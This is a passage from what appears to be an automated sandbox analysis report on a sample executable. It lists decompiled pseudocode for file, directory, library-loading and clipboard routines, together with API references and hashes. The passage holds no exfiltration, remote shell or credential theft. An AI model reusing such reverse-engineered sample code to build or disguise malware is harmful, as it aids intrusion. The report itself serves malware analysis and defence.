                                                                                      • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,73BCFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                                      • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                                      • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                                                    • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                      • Part of subcall function 004056E4: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                                                    • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp
                                                                                    • API String ID: 1892508949-47812868
                                                                                    • Opcode ID: f83e9c126ec5e5627e04690920b1fc6d95bfd0f8b27b2dc86f60bbb393f00223
                                                                                    • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                                                                                    • Opcode Fuzzy Hash: f83e9c126ec5e5627e04690920b1fc6d95bfd0f8b27b2dc86f60bbb393f00223
                                                                                    • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 59%
                                                                                    			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f470;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42ec0c =  *0x42ec0c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec0c, 0x7530,  *0x42ebf4), 0);
					}
				}
				return 0;
			}











                                                                                    0x0040138a
                                                                                    0x004013fa
                                                                                    0x0040139b
                                                                                    0x004013a0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004013a2
                                                                                    0x004013a3
                                                                                    0x004013ad
                                                                                    0x00000000
                                                                                    0x00401404
                                                                                    0x004013b0
                                                                                    0x004013b7
                                                                                    0x004013bd
                                                                                    0x004013be
                                                                                    0x004013c0
                                                                                    0x004013c2
                                                                                    0x004013b9
                                                                                    0x004013b9
                                                                                    0x004013ba
                                                                                    0x004013ba
                                                                                    0x004013c9
                                                                                    0x004013cb
                                                                                    0x004013f4
                                                                                    0x004013f4
                                                                                    0x004013c9
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                    • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                                                    • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                                                                                    • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                                                    • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00406500, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00406500(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a240);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
				}
				_t5 = E00406492(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                    0x00406508
                                                                                    0x0040650b
                                                                                    0x00406512
                                                                                    0x0040651a
                                                                                    0x00406526
                                                                                    0x00000000
                                                                                    0x0040652d
                                                                                    0x0040651d
                                                                                    0x00406524
                                                                                    0x00000000
                                                                                    0x00406535
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                                      • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                                                      • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                                                      • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2547128583-0
                                                                                    • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                                                    • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
                                                                                    • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                                                    • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405C90, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 68%
                                                                                    			E00405C90(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                    0x00405c94
                                                                                    0x00405ca1
                                                                                    0x00405cb6
                                                                                    0x00405cbc

                                                                                    APIs
                                                                                    • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe,80000000,00000003), ref: 00405C94
                                                                                    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: File$AttributesCreate
                                                                                    • String ID:
                                                                                    • API String ID: 415043291-0
                                                                                    • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                                    • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                                                    • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                                    • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405C6B, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00405C6B(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                                    0x00405c70
                                                                                    0x00405c76
                                                                                    0x00405c7b
                                                                                    0x00405c84
                                                                                    0x00405c84
                                                                                    0x00405c8d

                                                                                    APIs
                                                                                    • GetFileAttributesA.KERNELBASE(?,?,00405883,?,?,00000000,00405A66,?,?,?,?), ref: 00405C70
                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C84
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                                    • Instruction ID: e57869254d9b62c000b772120ebafc6e643eb49c03cb969dc299021a919e5f7f
                                                                                    • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                                    • Instruction Fuzzy Hash: 67D0C972504521AFD2142728AE0889BBB55DB54271702CB36FDA5A26B1DB304C569A98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405761, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00405761(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                    0x00405767
                                                                                    0x0040576f
                                                                                    0x00000000
                                                                                    0x00405775
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                                                    • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1375471231-0
                                                                                    • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                                    • Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
                                                                                    • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                                    • Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405D08, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00405D08(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                    0x00405d0c
                                                                                    0x00405d1c
                                                                                    0x00405d24
                                                                                    0x00000000
                                                                                    0x00405d2b
                                                                                    0x00000000
                                                                                    0x00405d2d

                                                                                    APIs
                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                                    • Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
                                                                                    • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                                    • Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405D37, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00405D37(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                    0x00405d3b
                                                                                    0x00405d4b
                                                                                    0x00405d53
                                                                                    0x00000000
                                                                                    0x00405d5a
                                                                                    0x00000000
                                                                                    0x00405d5c

                                                                                    APIs
                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3934441357-0
                                                                                    • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                    • Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
                                                                                    • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                    • Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00403300, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00403300(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                    0x0040330e
                                                                                    0x00403314

                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 973152223-0
                                                                                    • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                    • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                                                    • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                    • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Function 0040535C, Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 96%
                                                                                    			E0040535C(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ec04; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004052F0, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E0040618A(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a890;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ebec - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f428, 8);
							__eflags =  *0x42f4cc - _t150;
							if( *0x42f4cc == _t150) {
								E0040521E( *((intOrPtr*)( *0x42a068 + 0x34)), _t150);
							}
							E00404154(1);
							goto L25;
						}
						 *0x429c60 = 2;
						E00404154(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E004041E2(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ebf0, _t150);
						ShowWindow(_v8, 8);
						E004041B0(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f434;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ebf0 = GetDlgItem(_a4, 0x403);
				 *0x42ebe8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec04 = _t128;
				_v8 = _t128;
				E004041B0( *0x42ebf0);
				 *0x42ebf4 = E00404AA1(4);
				 *0x42ec0c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E0040417B(_a4);
				if(( *0x42f43c & 0x00000003) != 0) {
					ShowWindow( *0x42ebf0, _t150);
					if(( *0x42f43c & 0x00000002) != 0) {
						 *0x42ebf0 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E004041B0( *0x42ebe8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f43c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}



































                                                                                    0x00405362
                                                                                    0x0040536a
                                                                                    0x0040536d
                                                                                    0x00405375
                                                                                    0x00405378
                                                                                    0x00405507
                                                                                    0x0040550d
                                                                                    0x00405531
                                                                                    0x00405531
                                                                                    0x0040553d
                                                                                    0x00405543
                                                                                    0x00405565
                                                                                    0x00405565
                                                                                    0x0040556b
                                                                                    0x004055c0
                                                                                    0x004055c0
                                                                                    0x004055c3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004055c5
                                                                                    0x004055c8
                                                                                    0x004055cb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004055d5
                                                                                    0x004055db
                                                                                    0x004055dd
                                                                                    0x004055e0
                                                                                    0x004056dd
                                                                                    0x00000000
                                                                                    0x004056dd
                                                                                    0x004055ef
                                                                                    0x004055fb
                                                                                    0x00405604
                                                                                    0x0040560b
                                                                                    0x0040560f
                                                                                    0x00405612
                                                                                    0x0040561b
                                                                                    0x00405621
                                                                                    0x00405624
                                                                                    0x00405624
                                                                                    0x00405634
                                                                                    0x0040563a
                                                                                    0x0040563d
                                                                                    0x00405648
                                                                                    0x00405648
                                                                                    0x00405649
                                                                                    0x0040564c
                                                                                    0x00405653
                                                                                    0x0040565a
                                                                                    0x00405662
                                                                                    0x00405662
                                                                                    0x00405670
                                                                                    0x00405676
                                                                                    0x00405679
                                                                                    0x00405679
                                                                                    0x00405680
                                                                                    0x00405686
                                                                                    0x0040568f
                                                                                    0x00405696
                                                                                    0x0040569f
                                                                                    0x004056a1
                                                                                    0x004056a4
                                                                                    0x004056b3
                                                                                    0x004056b5
                                                                                    0x004056b8
                                                                                    0x004056b9
                                                                                    0x004056bc
                                                                                    0x004056bd
                                                                                    0x004056be
                                                                                    0x004056be
                                                                                    0x004056c6
